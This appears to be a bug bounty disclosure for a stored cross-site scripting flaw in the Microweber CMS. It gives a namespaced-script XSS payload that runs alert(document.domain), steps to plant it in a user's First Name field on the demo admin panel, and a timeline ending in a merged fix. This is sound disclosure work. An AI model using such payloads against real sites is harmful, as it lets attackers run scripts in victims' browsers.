Cross-site Scripting (XSS) - Stored in microweber/microweber

Valid

Reported on

Jan 27th 2022


Description

Stored XSS occurs when changing a user's profile

Proof of Concept

XSS POC : "><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(document.domain)</something:script>

1. Open the https://demo.microweber.org/demo/admin
2. Go to "Users" > "Edit profile"
3. Change the value of "First Name" to XSS PoC
4. Refresh

Impact

Through this vulnerability, an attacker is capable to execute malicious scripts.

We are processing your report and will contact the microweber team within 24 hours. 4 months ago
We have contacted a member of the microweber team and are waiting to hear back 4 months ago
We have sent a follow up to the microweber team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the microweber team. We will try again in 10 days. 4 months ago
Peter Ivanov validated this vulnerability 4 months ago
TroubleMaker has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on 05d55f 4 months ago
Peter Ivanov has been awarded the fix bounty
to join this conversation